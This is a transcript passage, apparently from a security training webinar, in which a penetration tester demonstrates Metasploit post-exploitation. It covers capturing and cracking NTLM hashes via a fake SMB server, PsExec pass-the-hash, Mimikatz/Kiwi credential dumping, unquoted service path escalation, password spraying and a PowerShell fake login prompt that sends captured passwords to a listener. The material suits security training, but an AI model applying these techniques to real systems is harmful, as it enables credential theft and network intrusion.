disabled. But here's the NT hashes. So now if we switch back to our, I'm going to close out the Python. If we go back to our temp directory, we have this file johnpasses.text _ net NTLM v2. And if we cat that, there's all of our hashes in a format that's very convenient for John to mess with. So just to demonstrate that, I'm going to run John here, and I'm just going to run it against that. And again, no, I'm not doing anything fancy. It's a simple password. And you'll notice it cracks all of those hashes right away, and it says the password is password1. So obviously you can imagine the scenario where you do a little bit more advanced password cracking. You can do some better stuff and be able to figure out some of those. Just as a quick example, if you're able to run this and get lots of people to connect into you, let's say you find a writable directory that turns out to be the web root of the client's internal wiki page. If you can go on there and add in this little image file, and all of a sudden the entire company, say they open up Internet Explorer and it defaults to the wiki page, now you're going to start getting these hashes rolling in like crazy. One of the first things that I always check for is, let's say it's right now, I would check to see how many of them have the password summer 2015, or maybe add an exclamation mark or something to the end of that. In a few months, I'll change it to fall 2015 or winter 2015, etc. That's a really common password. If you have lots of hashes across the network, you're more likely going to find at least one user that has that password. Again, that depends on the size of the organization and what their password policy is. Other things you can do with this, if you have a cross-site scripting vulnerability, if you have any type of injection on a website, if you're doing a web test, those are different ways that you could also get people to connect back into you. I've seen commercial applications that run on a shared drive. So everybody goes to this drive. They've got a shortcut on their desktop that runs it over the network. And for whatever reason, that application uses an IE instance within it that loads the default web page. Well, if you have write access to that drive, which in most of those cases people do, you often can go in there and modify that executable file, and modify the HTML web page, add in your own code, and then everybody who runs that over the network is going to start sending you their credentials as well. Now, this is interesting. Since we're in Metasploit, if we come back over here and type in creds for our database, notice we have all of the hashes thrown right in there already. We didn't have to do anything fancy. Metasploit just said, hey, wow, you've got some credentials. Let me have those. We could also, if we wanted to, all of the setup for this SMB, we could add that to our dotRC file automatically. So if we started to say, hey, every time I do a test, here's some specific things that I'm going to do, you could go ahead and build all those into one big RC file. So you get on site, you get set up, you run this, it starts up with all these different things listening already. So you kind of have your attack box that already has all these handlers listening, and then you can spend your time focusing on the actual attacks. So the next thing I want to look at is PsExec. And PsExec is something that I'm sure everybody's probably familiar with. It's been around a long time. But it's kind of a natural step once you have some password hashes. One of the things you can try to do is use them with PsExec. PsExec was designed by Mark Rusinovich. It was part of his group of it's called sysinternals, part of his group of system administration tools. wide range of things that he designed and developed. That was actually purchased by Microsoft, and they hired Mark to come work with them and continue development. So there's some really neat stuff. If you're not familiar with sysinternals, you definitely want to check those out. But several years ago, H.D. Moore took PSExec and he modified it and created a Metasploit specific version of it. So we're going to look at how we can use that to do a little bit more stuff. How am I doing? Am I talking too fast? Hopefully somebody's still here. I haven't put anybody to sleep yet. You're good. All right. That's what my wife says too, but I always question whether or not she's just telling me that. So I'm just going to go ahead and go. I don't know that if anybody needs to take a break, if you want to post that, we can take a couple minutes, but I'm just going to go ahead and keep moving unless somebody says otherwise. So like I said, with PSExec, we got some hashes. Let's see what we can do with them. So I'm going to come over here and I'm going to type in search PSExec. And part of the reason is I can never remember the names of all the different modules in Metasploit. But the search function works really good. So when I type in search PSExec, we get several different modules. There's PSExec command. It's a Microsoft Windows authenticated administration utility. I don't know what that is because I've never tried to use it, and I don't know why. But I use all the time this one here, exploit Windows SMB PSExec. And I'm guessing, I don't know for sure, but I think what they are, this one actually exploits and returns an interpreter shell. I believe this one is just for executing a single command. So to be honest, this one would be almost identical to the actual PSExec command tool. This one is designed for deploying a payload and getting you access. Hold on. Any other favorite ways to have the user follow the UNC link to the fake SMB server besides phishing email? So I haven't had great luck with phishing emails, and it comes and goes, and I think it has to do with the clients they're using. People that use web-based clients, it tends to be all right. The problem is Gmail, the images don't usually come through. Gmail either sends it to spam or they don't load the images or whatnot. Some of the other ones, Outlook Web Access tends to be all right. But if they upload it directly in Outlook, I've had mixed results. So I don't know if that's specific to the version. I've never really done a lot of testing. I've just kind of shied away from that. I know there are people out there that say, hey, yeah, this is great and it works every time. And I don't know if that's because of something I'm doing wrong or if they're just making that up. I can't tell you that. Other ways to do it, the most common way I found, just because it works, is a web page. Now, I guess as far as a phishing email, if you can get somebody to click a link and have it in the link of the URL, that would work. So at that point, you're not putting the image and the link in the email itself. You're putting a link to another website, and that website has it on. Yeah, that would work absolutely. I'm trying to think of other ways that we have done that. I have seen so this was actually entertaining. We were at an airport and they were pretty locked down. They were pretty secure, but we got access to an older system. It was a server. I can't even remember. I think it was running Windows 2003. It doesn't really matter, but everything was locked down. It was pretty good. We couldn't do anything, but we were able to compromise that system. But we couldn't get any network hashes. We couldn't get any credentials. And so we had the idea of what can we do to lure a sysadmin here. And so what I did is I created a link on the desktop, and I can't remember what we called it, but something that looked suspicious, something that we knew they would open. And all it was a shortcut back to our SMB drive. And then we went and created we took a known malicious file, and I don't remember which one we used, but something that I think it was actually Windows Credential Editor, wce.exe, something that AV will catch every time. And we changed the name of it to a bunch of Chinese characters, and then we threw it on the C drive, and the AV popped up. And then we threw it on the C drive again, and the AV popped up. And we did that like 5 or 10 times. So, of course, what happens is their admins, whoever, they start getting all these alerts of this strange executable file being thrown on the C drive with Chinese characters, and they freak out. So of course, a sysadmin logged into that machine, which we had an interpreter running on it already. They logged into that machine and started looking around trying to figure out what was going on, and they found the files, but they couldn't find out what was happening. In the meantime, we logged the password. We were able to steal the password from their stuff, and our goal was to get them to connect back with the SMB through the shortcut so that we could steal their hashes. But instead, we were actually able to use Kiwi, which we'll look at here in a few minutes, and just steal their plain text passwords, which they happen to be using a domain administrator account for incident response, which is a horrible idea. If you know a system is compromised or you think it's compromised, please don't use a domain administrator account to log into it. Anyway, that gave us obviously quite a bit more access. So that's something that we tried to do and ended up not really being necessary. But if you have time, if you can start planting some links around in other places like that, usually you'll get somebody to connect on them eventually. The problem is when you're on a limited time engagement, it's always a matter of trying to figure out how far do we go and what can we do, the most efficient way possible. So back here with PS Exec, there's several different things. You can try out these the different modules that do different things. One of them, I thought this was neat. I haven't played with this much, but I tried it out. Windows Local WMI. I don't know why this comes up when you search PS Exec, but basically it does the same thing as PS Exec, but it uses WMIC. Which is very convenient as well. But I didn't write up how to do that because I'm not as familiar with it. So right now we're going to do, let me find my notes. All right, we're going to use exploit Windows SMB PS Exec. And we're going to show options. All right, so there's a number of options here. The rhost is, hold on, let me walk through this here. So the rhost is the system that we're connecting to. So we need to come back over here to our Windows box. ifconfig does not work on Windows, in case you were wondering. And this is our box, 192.168.1.23. So we're going to set rhost 192.168.1.23. The R port is not going to change, though I've heard it's possible to change SMB port. I've never seen anybody do it. I don't know why you would. And then the SMB pass and the SMB user. So we're going to set SMB user as demo. Actually, no, we're not. We're going to use secure ideas because that was our over here. So secure ideas was our name. Oh, unknown command. Try set SMB user. And then we're going to do set SMB pass. Now, if we knew the actual password on that box, which we did because John compromised it, right? But let's say we weren't able to, well, let me just show you both ways. If we do password 1, and now we run that, it can't run because we already have a handler running. So let's, jobs. If we look at the jobs, we're going to do jobs-K, and we're going to kill job 0 because that's the one that was listening on 4444. So now, just make sure we're all still good, and we're going to run that again. And this time, something errored out. Let's find out. So it says starting reverse handler on 4444, connecting to the server, authenticating on work group as user secure ideas, uploading the payload. It created some random name. It started it as a service, which is how PS Exec works. It copies a file to the system and then starts a service. But for some reason that doesn't get flagged by AV. It's just part of the way. I don't know if PS Exec is whitelisted or if it's just the way it works is bypasses the AV. But anyways, once the service is started, then it deletes the executable and then it sends the stage and whatnot. I have seen this before, this error. It says exploit failed, but then it actually opens a session. So we can see we're getting information from it. We're actually connected to the box. So status sharing violation. I don't really know what that error comes from, but obviously we're connected and we can do stuff, which is good. But I'm going to go ahead and exit out of that because I want to show you something different. A lot of times we don't actually have the passwords. All we have is the hashes. So if we do set SMB pass and we come back over here, we're going to copy that's not right. Hold on, that's the let's do this. Let's do creds. For some reason that doesn't look right. Maybe it is. No. What am I looking at? Well, we'll try it. I don't think this will work, but we'll give it a shot. So we're going to set SMB pass paste. That's not a we're not in the right format here. So if we run, it says login failed. Well, I don't know why that's in a different format, but I just happen to have, because I did this before, I have the other format. So I'm going to paste it in here. If we run it with that, validation failed, data has already been taken. Okay, I'm not sure what's going on. Something's failing here. Sessions. I'm guessing it has to do, I wonder if I can, let's do this. Let's completely exit out. Oh, you gotta ask. Metasploit won't let you. Jeremy's saying semantic enterprise edition of AV bust the interpreted version of PS Exec. The real PS. Interesting. I hadn't seen that. Is that recent? Or has I been doing that for a while? He's saying. I'm not sure everybody got that. He says the semantic enterprise edition of AV busts the interpreter version of PS Exec. The real PS Exec from Microsoft works well though to go from admin to system. I think that is the network hash that includes the client challenge, server challenge, and exactly. Yeah, that's why it wasn't the right. That type of hash cannot be passed. Yeah, I'm not sure. In my notes here. Okay, he's saying that was about a year ago that they changed that. I haven't noticed that. So it might be just that the clients that I've worked with recently aren't using that version or haven't updated for some reason. Yeah, the thing I'm struggling with is I thought the SMB capture passed the correct format of the hash, and I'm not sure why it didn't. But here we can do something else. Let me. Here's a better, just another way of getting it. So we're just going to go ahead and connect to one of our sessions. I'm going to do -I for interact. And we're going to say session 1. And then we're going to use what is the, I can't remember the command for hash dump. Things are going too smoothly. That's the problem. Live demos never work right. Let's try a different one. I have found that when you have multiple, and I mentioned this before, when you have multiple interpreters running on the same system, weird stuff starts to happen. There we go. Okay, so for whatever reason, that didn't work in the first session, but it does here. So here we actually have the format of the sessions we want. So if I copy this out, and I'm just gonna go ahead and quit that one. Now we can set our SMB pass to that. And there it goes through the process and runs, and we get another shellcode. So obviously, like as Jeremy added with the Symantec Enterprise Edition, there may be problems with that. I'm wondering if that's something that's been updated in Metasploit, because I'm surprised I haven't seen it not work. But obviously, you'll want to test that and play with it before you use it in a real engagement. So close that out. Let me move on. Let's see, go back to where we were. I've also, one other thing I wanted to note, there are certain domain settings, group policy settings on domain systems that will prevent this. I would say maybe 50% of the time I've seen where they have PS exec to block completely, so you can't use it. And 50% may be high, maybe 40%. But it really just depends on the type of environments you're testing. If you tend to be in enterprise grade areas where they've got a more mature security program, it's very possible some of this stuff might be blocked. But it's still worth a shot to get through. So at this point, I wanted to step kind of beyond. Okay, we've seen some different ways of compromising systems. We found some ways to get passwords and hashes and whatnot. I wanted to look at things that we can do after we've compromised a system, where we can go from here. Things to like I talked about earlier, about our goal should be to demonstrate business risk, to be able to show the executives and the C-levels, not just, hey, here's a list of the vulnerabilities we have, but here's what we were able to do with that. Here's why this stuff is important, which is really the whole point of a penetration test. The exploitation phase is the next step that comes after a vulnerability assessment. So our scenario here, if we kind of think through, we've popped a box in some manner. We want to expand. We want to escalate privileges. We want to find data. We want to attack some other systems. And we just want to see where we can go. So the first thing I was going to show you, let's see where we're at with our sessions. All right, so the first thing I was going to show you was sessions-I3, the hash dump module, which I've already done that. But just so you can see that when we do hash dump, it'll pop up with the, all right, so that one's failing too. Let me start all over here. Shut these down. All right, no sessions. So if I come over here and run this again, tell you what, I'm going to completely exit out, and then we're going to start over just to make sure everything's cleaned up. Metasploit has come a long ways in the last 4 or 5 years or so, but stuff like this where you're repeatedly doing things over and over in a demo type environment, it's not really what it's designed for. So you will find weird things. When things just don't work like you think they should, just don't be afraid to close it out and start over. Obviously, the only way you'll know how it should work is to practice and repeat it and do it over and over again. All right, so now we've got this session. We've compromised the system in some manner. We're going to interact with that. And hash dump is what I showed you a few minutes ago. When we run that, it basically is going to dump the hashes for all the users on the system. This doesn't work for all systems. It doesn't work with all. It depends on what level of access you have. Currently, we are, let's see, get UID. So we're running as on the Windows 7 VM box, and our username is Secure Ideas. We do have administrator access on this box, so that will grant that. If we had a lower level user, you wouldn't be able to dump the hashes out of the SAM database. There's another method for getting hashes and passwords that we're going to look at in a few minutes. This is the oldest, and it's still pretty reliable. There's several other post modules, maybe gathering modules, enumeration modules, that kind of thing. So I wanted to walk through just a few of them and show you some of the ones that I use regularly. One of the first ones I do is we're going to run post Windows gather enum services. And what this does is it's going to make a list of all of the services running on that box. It takes a minute here, but we're going to see why this is valuable. So with modern systems, really with Windows 7 and beyond, privilege escalation has gotten to be very difficult. It's not always easy to escalate to system, but there's a lot of things that we can't do unless we are system. So trying to figure out some way to escalate privileges is one of the first things that I start looking for on a box. One of the methods for doing that is looking for services that are configured insecurely. There's two ways that can happen. One is if you look over here at where the service executable is located, you want to look for things that you have access to write to. If they say Windows or Windows System 32, or if it's in program files, you're probably not going to have access to that. See Windows E Home, yeah, maybe it's worth checking to see what that is and if you have access to it. But a lot of times what you'll find is some custom application that they've written, and it's located in C/home/application name. And there's a good chance that as a limited user, you still have the ability to write to that. If you can, then you can go in there and modify the executable so that when the service runs, it includes your payload. The other issue is the thing to look for is, and actually that might be one right there. The other thing to look for is unquoted. What am I saying? Unquotable paths, unquoted paths. So for instance, right here, this whole path, C program files, Mozilla maintenance service.exe, the whole thing is in quotes. So it's always going to look in that path. But, and this is a freebie, I didn't actually realize this was on here. This path is not quoted. So the first place that Windows is going to look for the executable for RTL service.exe, for the program, the first place it's going to look is C:/program. And if C:/program exists, it's going to run that. If it doesn't, then it's going to look in program files, blah, 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 etc., the rest of it. Actually, I think what it'll do, and I don't remember the order, but since we have multiple spaces in here, I think it'll look in, C program files, Realtek, RTL 8187, and then go from there. So I don't remember the order, whether it looks in C program first or the other one first. But that very well, if you have the ability to create a directory on the root drive as C program, create an executable there named that, then that service will start up as that. And then you can, let's see who this is running as. Yeah, so this is actually running as local system. So right there, you should have the ability to escalate, which would be pretty awesome to find. In most enterprise organizations, I don't find that very often anymore. It used to be really common several years ago when it was first discovered. It kind of became a big deal. But then since then, it's died down. But that's one of the first things I look for. Another one is run post Windows gather. And we're going to do enum SNMP. Now, obviously, most Windows 7 systems don't have SNMP installed. I went ahead and installed it on this one just so you can see what happens. This is very common on servers, though. And so what it does is it checks to see if SNMP is installed. It says, yes, SNMP is installed. It's looking for community strings. I didn't set anything up on here. It's looking for traps, and it finds community name trap, super secret destination. Obviously, if they have this set up so that they're actually monitoring their Windows servers with SNMP, by getting a interpreter session on there, you can pull that data out very easily. Another one, run post Windows gather enum shares. Basically, just like you would expect, it's going to go through and dump out all the shares that are available on that system. Sometimes that's useful just to see what's on there, and there's things that you might not have thought to look at. There's a lot of these. If we say run post Windows, and it's going to say all 149 possibilities, sure. And you can start to look through these. And these are just the Windows specific ones. There are some that are not specific to any OS, but just to limit it, to make it easier, I've limited it to just Windows. So you can see there's an ARP scanner, check VM, screen unlock, golden ticket, credentials. There's lots of credentials, bulletproof FTP, core FTP, FileZilla, FTP Navigator. Obviously, it's very common for people to store passwords in FTP servers. So there's several different modules here that let you pull those out. Now, the only way you're going to find these is, one, if you know that the module's there, which means you have to look through here once in a while and get familiar with it. And two, if you actually look at the applications that are installed. So there's actually, right here, gather enum applications. We're going to do gather enum applications, and it's going to go through and make us a list of everything that's on that system. So the next thing you can do is look through and say, okay, are there any of these things that I know there's a Metasploit module for? Do I want to go check those out? As I said that, I all of a sudden had this fear as I typed this of what's on this system that I didn't think I wanted to share with everybody. But other than Minecraft, I don't think there's anything there too embarrassing. We'll pretend that that's for my kids. There's a couple others. I'm waiting for the comments to roll in, some smart aleck comment, but nothing yet. There's some other modules that I use pretty regularly on here. I don't have them set up to be able to demonstrate them with this VM. One of them, for example, well, we can run it, but it won't. I don't think it'll show anything. If we run post Windows gather enum IE, that will actually pull quite a bit of data from Internet Explorer, history, cookies, and whatnot. Because this virtual machine, I don't really use IE for anything other than a demonstration like this. I don't think it'll find anything. This can be useful sometimes depending on the version of IE and how it's configured. There's a similar one for Firefox. There's one for Chrome. What's that called? Gather. Yeah, enum Chrome. The Firefox is different. I never can remember what that's called. But the same thing. They look for history, they look for cookies, they look for stored passwords and credentials and that kind of stuff, and they pull them all off. Now, most of those, when they're pulled off, they're not in just like a plain text readable format. You actually have to do a little bit more to sort through some of the data. But that can be a way to find some interesting information. That's particularly useful if you're targeting clients for people that are actually using those systems more regularly. IE on a server generally doesn't have a lot of details. Another one that's worth looking at, and again, this isn't going to have much in it. It won't have anything in it here, but Windows gather credentials GPP. So what this is looking for group policy passwords. There's a number of different systems or scripts and whatnot that will do this, but I like the one in Metasploit. It works really well. The first thing it's going to do is it tries to enumerate domain controllers. So it's going to look at the server, like if this box is on a domain, it's going to look at the server that it actually authenticates to on the domain. And then it's actually, I can't remember all the steps. There's 2 or 3 different ways that it tries to enumerate domain controllers on the network. And then it's going to try accessing, It's going to try accessing all of the sysvol shares and scroll through all of the scripts that are on there. If you have an organization that uses group policy settings a lot, and they use a lot of scripts, and you have multiple domain controllers, this is going to scroll for maybe 10 minutes. It's going to go through and it's going to look at every script. And so what happened years ago, I don't remember how far back, 5 or 10 years ago, Microsoft's recommended guidance for running scripts on a server or on any system with administrative credentials was to use this special way they called it encrypt, but effectively you were encoding the password. And I say that because the method for decrypting it was fairly simple, and it used the same key for every system. So once it was figured out, Microsoft said, yeah, that was bad of us. There's no way to fix this. It's everywhere. Don't use this anymore. But what we have is a lot of people don't know that. A lot of people still use it. There's a lot of examples online that still show how to store and encode or encrypt administrative credentials into a group policy script. So those get saved in the sysvol directory, and any user with domain access can access those. So Metasploit will actually pull those out. It'll search all the scripts for those. It'll find them. It'll decrypt them, and it'll throw it up here in clear text for you. I would say maybe I don't know, 20% of the internal engagements I'm on, I find credentials this way. Not all of them are current. A lot of times what you have is, hey, here's a script from 6 years ago that nobody has touched, and that, those credentials aren't valid anymore. That user doesn't even work here, but they're there. And a lot of times too, you'll find older stuff that might give you insight into the way group passwords or service account passwords are generated. So that can be useful. And then another one, again, I can't run this. This won't work here, but let me show you. Post Windows gather enum ad user comments. So a lot of people use Active Directory comments for all kinds of stuff that they shouldn't. And what they don't realize is every Active Directory user can view that information. You don't have to have special credentials. You don't have to be a domain admin. You just do that. And so what this does is it will use the account of the machine. Okay, unable to find the domain to query. It will use the account of the machine that you're on. It will connect to the domain, and it will start enumerating all of the users, and it will pull out all the comments. There's some other enumeration stuff here. We can pull AD computers, AD service principal names, AD users, all that kind of stuff. But most of those, that's a lot of information. Sometimes in certain cases, especially if we want to like brute force users, I might use that and dump it all to a file so that then I can, like we talked about using winter or summer 2015 as a password. So what you can do is you can use this to dump all of the Active Directory users, pump that into your favorite brute force tool, and try it with just 1 or 2 passwords. You can actually look also, what's the command? There's a command that will show you what let me see. I never can remember this one. I apologize. There's a command that will show you what the password policy is for the box. And I don't remember offhand what that is. It might be get env. No, I'll have to find out what that. I don't remember offhand. But basically, if you look through here, there's a command you can run that will show you what the password policy settings are, so you can see how quickly they lock accounts. So you can know, okay, well, we don't want to mess up accounts. So if they lock after 5, maybe we can try 3 different passwords, and we'll try the same 3 passwords on every account. And if we got 500 users, maybe we'll get lucky on 1 or 2 of them. So that's that on that. Like I said, I can't reiterate enough. There are so many post modules. It's definitely worth going through and getting a feel for what they do, how they use them, or how to use them. And also, every time you start MSF console, it throws up, hey, here's, so let me just exit that out. When it starts up, it's going to show you, here's how many modules of this type. Here's how many, here we go. So there's 1,467 payload modules, 840 auxiliary modules, 232 post modules. These I pay attention to quite a bit. Most of the time, the exploit modules, there's so many different ones and so many things that are really special use cases that I don't care that much. But when I see new auxiliary modules and new post modules, I want to go find out what's going on. And Rapid7 does a pretty good job of providing release notes on when new things are released and that kind of stuff. So that's definitely worth checking out. Moving on, the next thing I wanted to show you was, we talked about MimiKatz earlier, or I don't know if I mentioned it by name, but another way to extract passwords and hashes. So let me go ahead, and we got our handler started. So I'm going to come back over here and connect. And again, we're in the post-compromise phase. So we're coming at this from the perspective of, we've already compromised a box. We've got an interpreter session, and now we're on it. What do we want to do? Well, one of the first things that I try to do is see if we can get system access. And first we need to see where we're at. Get user ID. So I'm running as a standard administrator user. I don't have sysadmin access yet. There are some modules that still work fine with that, and some that don't. And so that's something you need to work through as you try different modules and see which ones require access or not. MimiKatz was a tool written by a guy named Benjamin Delpy. He goes by the handle Gentle Kiwi, and it's spelled weird. I never can remember exactly how it's spelled. I just remember Gentle Kiwi. Because when they first read it, it doesn't read that way, and it took me a while to say, okay, here's where the words separate. I get it now. It was designed to extract passwords, hashes, PIN codes, Kerberos tickets. It was all that stuff. It was designed to pull it from memory. And it's funny because if you actually look at his website when he released the first version, he basically said, this is something I was just playing around with to see what I can read in memory. Hope you enjoy it. And it very quickly became, I don't know, at least the most popular, if not the best way to pull any of that kind of data from memory. I don't remember if it was him or somebody else wrote a Meterpreter tool or Meterpreter module for it called MimiKatz. And then later he released a second version of it. And so rather than update the MimiKatz module, they released a second module called Kiwi. There is a standalone version you can run as well, the original version he released, but that's all in French. So it still works the same, but you got to kind of work through the help docs to figure out what you're doing because it's in French. I'm sure somebody has released English directions for it by now, but the original is all in French. So let's see here. So if we do load space and tab, you'll see several modules here that we can load into Meterpreter. And what these are extensions of Meterpreter that maybe they're big enough that we don't want to just throw that content into the payload every time because that's going to raise the file size that we have to pass through. And if we have a really bad connection, it's more likely to get caught. Or maybe the larger the file is, the more likely it's to get detected, that kind of thing. But all these modules exist within Metasploit that then we can load them when we need them. So if we load, I'm going to go ahead and load MimiKatz first. And loading extension, success. And now when I type help, you see I have MimiKatz commands, and there's several different things there. Attempt to retrieve Kerberos creds, several others. But for the most part, I rarely use MimiKatz anymore. It's pretty much been entirely superseded by the module Kiwi, and I'm assuming that's based on the guy's last name or the last part of his handle, Gentle Kiwi. I'm guessing he's from New Zealand. I don't know. Does anybody know that? So there's his website, as we can see, Gentle Kiwi. So it's ported to Metasploit by OJ Reeves. So now when we type help, we still have the MimiKatz commands because we loaded that, but now we also have the Kiwi commands. And there's several other things you can do here. We can try to grab several different types of creds individually if there's something specific we're looking for, or we can do creds_all, which basically does all of those things. There's some other things, creating a golden ticket. I'm not going to go into an example here how to do that. That's a little bit more advanced. But the idea is that it gives you a Kerberos ticket that has effectively an infinite life. I want to say it's like 10 years. I don't remember if it's actually infinite or if it's just a really long time. But it gives you a Kerberos ticket that you can use indefinitely throughout the organization, which is very useful. You can list other Kerberos tickets. You can do some other things there. So first off, I'm just going to do creds_all. And not currently running a system. So I can't do this unless I'm running a system. So what I'm going to try is the command called get system. And this is pretty straightforward. Basically what it does is it runs through several different types of exploits to see if there's some way it can get system access. It totally depends on what level of user you're running as. The user that we've exploited here is already an administrator, so jumping to system wasn't a significant issue. If you are a lowercase user, or not lowercase, a less privileged user, get system probably isn't going to work for you. You're going to have to find other issues, like for instance where I talked about the services that are unquoted in the path. But now that we got system, we can do creds_all. And it's going to come back with all the different passwords that are in memory. Notice the secure ideas user is the only one that's actually logged in currently on this box. If we logged out and logged in as another user, then their stuff would be up there as well. LSA dump is another thing that sometimes has some interesting stuff there, and you can scroll through there and just see this system isn't really being used for anything, so there's not much there. It does give you the NTLM hash though that you could throw back into John or use with PS Exec. And then the other thing that I found useful a few times is Wi-Fi list, which lists all the Wi-Fi profiles and credentials. If we type in Wi-Fi list, it's going to come up and it shows us the name, SSID corporate network, and the PSK, which is very useful. Home network and the WEP key. For whatever reason, the auth type, it calls it open when it's WEP. I don't know why. I don't know if that's a Windows thing or if that's just the way the module does it. But when you see open there, it actually means WEP. So that can be useful. A great way to kind of shift the attack, the playing field, I guess, the footprint of where you're able to attack from. So another thing that is useful as part of the post is to automate some of this process. So there's several things that we've shown here that can be useful. There's a lot of different modules. You're going to find some that you like better than others or some that you use more often than others. And one of the things that can be nice is to have those happen automatically every time a new interpreter session pops up. Sometimes the process we're exploiting is sensitive. So here's one example. Migrate is a command we haven't looked at yet, but migrate, basically what it does is it takes and moves you from the process you're in into another process. Sometimes the process that we've just exploited might be really sensitive, or it's something that we don't want to crash. And as I've talked about here, sometimes when you're doing stuff in Metasploit, stuff crashes. It just happens once in a while. We're doing exploitation to some degree. So we don't want, let's say you exploit a Tomcat server. You don't want that to crash, because if you get kicked out, you can't get back in. And it might be doing something important on the customer's network. So if we can keep it up, all the better. So migrating into another process is ideal. Let me just show you that. First thing we're going to do, if we type PS, it's going to show us a list of all the processes running on the system. We're within Interpreter, obviously. Now we can migrate into anything specific. So like here, there's a Notepad 3836. So I can do migrate. Oh, actually, before I do, I'm going to do get PID to see where I am. I'm currently in 304, which is my TinyMet process. If I do migrate 3836, correct? Yes. It's going to attempt. This doesn't always work, but normally it does. If it won't work, you can't migrate into a process that's higher authority. So for instance, if Notepad was running a system or as another user that I don't have access to, then it wouldn't migrate correctly. But here I'm migrating to another process owned by Securities, so I'm good to go. There's another way to do this called, there's actually a post module. So here, see, we had to run PS, we had to decide which process we run as, and then we had to give it that process ID. If we use the post module, so we're going to run post Windows manage migrate. This doesn't take any parameters. What it does is it actually starts a new Notepad process. It says spawning notepad.exe process, migrating to it, and now we moved over to it. If you come over here, there's nothing, it doesn't show up on the screen. But if we go look in our task manager, you see we've got another Notepad process. I don't remember which one was the original one and which one we added, but so the post module can be useful from an automated perspective. So what we're going to do, I'm going to switch back over here and I'm going to create. I'm going to do nano script -rc. And in that, we're going to put some different modules in that are neat, that are worth running. I don't usually do all of these every time I set something like this up, but I'm going to give you an idea what it looks like. So I'm going to do run post Windows manage migrate. So the first thing we're going to do is migrate out of the process we got into. Then we're going to do get system to see if it can bump us up to a new higher level of privileges. Then we're going to do get UID to see that we actually did that or not. Then we're going to run hash dump. And then we're going to do post. I just picked a couple of things here. Windows gather check VM, because that can be useful to know whether or not we're in a virtual machine or not. And then we'll do sysinfo. So now all those things are written into a script. And what I'm going to do is I'm going to add that to the handler starting script that we did earlier. And I'm going to come down here, and before the exploit, we're going to put set auto run script multi-console command. That's quite a bit. Basically what we're saying is we're going to set the auto run script, and it's going to be set to multi-console command, which runs with the -r script.rc. I know it's a lot there to kind of take in, but it's basically pretty simple. What we're saying is we're going to start a handler, and that handler is going to have an auto run script, which runs on all new sessions. It runs whatever's in script.rc. So now we're going to close that, and we're going to come over here and, okay, that's dead. So now we're going to completely exit out of Metasploit, and we're going to start it over, and we'll walk through here and see what happens. So Metasploit's starting. It's going through with our resource file, and it's starting the multi-handler, and you notice it set the auto run script in there as well, and everything's up and running. Now when we come over here and we reconnect again, a couple things happen. It starts the interpreter session just like before, and I obviously did something wrong. Oh, I forgot the C. All right, hold on, let's exit out of that. All right, so this should be .-rc for that script. Run it one more time for the big money. So once again, we get everything started up here. Oh, yeah, so our process over here was already running. Now we see that it connects. It starts to run the script. We can see that it does the migrate, and it migrates to a new process. And then it tries to get system, and it says it got it. And it shows we did get UID, so that shows the system. And then we do hash dump, and it dumps it out for us. And then it's going to check VM, and it says, yep, it's a virtual machine. This is a VMware virtual machine. And then it's going to dump the sysinfo for us. And so this can be useful in a couple of different ways. One, every time one of these connect, we can just kind of scroll up there and look and see, okay, what just connected? Here, what do we got? Where do we want to go with this? And then this is also all logged within the Metasploit logs. So if we weren't sure about something and wanted to go back and check whatnot, we can pull that up. The other neat thing is all of these hashes that we did, if we go back and look at creds, I thought that would be in there. Okay, I'm wrong. Is it loot? No. Curious. I thought it actually put the hashes in there. Maybe not. Okay. Anyway. So I got a couple more things here really quickly. We're getting close to the end of the time. The first is PowerShell. I'm just going to walk through this. So we've got a session, -I1. We're connected to our session. We're running a system. Nah, that's fine. I don't think it matters for this. I'm going to run. We have the ability to run PowerShell as that system. So I'm going to go over here and I'm going to do search PowerShell, and it's going to come up with several different things. But really what I'm looking for is the post module, this last one here, post Windows manage PowerShell, exec PowerShell. So if we copy that, and we're going to do use show options. Now, all we're doing is we're giving it a PowerShell script to run, and we're giving it a session. we're going to set the session to 1. And this script, if we go look at it, this is just the default that's built into Metasploit. All it does is it says some text equal hello from Metasploit, some text equal, and it puts it in this directory. That's pretty simple, right? So we're going to come over here and we're just going to run this. And boom, it does it. If we come back over here and look in our file system, there's our flag file, hello from Metasploit. Pretty straightforward. But what we want to do is kind of do some more advanced stuff. So I found something that a while back, and this is somewhat outdated, but it's still a really neat example. Mubix, or Rob Fuller, has a neat program called Metasploit Minute, where he does several different cool things you can do in Metasploit. And basically what he's done is provided a way to steal credentials from a user. This is the slickest way, I guess. I'll say it that way. It's the slickest way I've seen of doing this. I would definitely check out his stuff, and I don't want to say I'm stealing his code. I've modified it a little bit, but not much. The example totally comes from him. So check out room362.com for more of his stuff. It's very cool. But what we're going to do is we're going to get in our session. Let's go back over here. Session-I1. Oh, sessions. I always leave off the S. Okay. Get UID. We're running a system. So we want to, here's the deal. If we run a PowerShell script on the machine, it's going to run within the context of system. Well, in this case, we don't want that because nobody's going to see the pop-up. It's very common to compromise a web server or some other service and get a session running as system, and there's another administrator already logged into that system. And we want to target that user. So what we're going to do, we're going to do PS, and we're going to find another process that's running as that administrative user. So here we're going to migrate into 38, and we're saying, wait, I can't migrate. Why can't I migrate into that? 3836. All right, there it goes. Okay, I think that other one's crashed or something. So you're saying, wait, we're going to migrate from system down into an administrator user or user level? Why in the world would we do that? Well, we'll see. So once we have that, now if we do get UID, you'll notice we're running as secure ideas. So anything we do in PowerShell is going to run under the context of secure ideas. So I don't have a lot of time to walk through the commands here, but we put together a PowerShell script, and just really simply what this does. The first couple commands basically set up a pop-up box. We're going to say it's going to be called failed authentication. You'll see right here. We're going to take the actual user domain name and the user username and put those in the box so it looks legit. And those are all going within the prompt for credential. And then the last part, the server certificate validation callback, this basically says don't check the SSL certificate. We're going to give it a non-valid certificate, so don't validate that. Then we're setting up a web client, giving it a user agent, which doesn't really matter that much. We're going to tell it to go ahead and use the Internet Explorer proxy settings if it has proxy settings configured. And then we're going to tell it to pass all of that, the username and the credentials, the password and all that, to this web client, and we're going to tell it to send it to this server, which is actually wrong. We need to prompt because our IP changed. So we're going to change this to 29. Okay, and now what we're going to do is switch back over. Background, show options. If I could type. All right, so now we're going to set our script. Yeah, send to /temp/prompt. And we're also going to run that in session 1. But before we can do that, All right, I forgot. Before we can do that, we have to set up our listener. So we're going to instead, we'll come right back to this. We're going to set up use auxiliary server. You remember when I was showing you the auxiliary SMB module? There's several different ones, and this is just a simple HTTP server. So we're going to set up a couple of things. We're going to set SSL to true instead of false, because people are going to be sending us their credentials. We don't want to do that over the network unencrypted. We're going to set the server port to 443 instead of 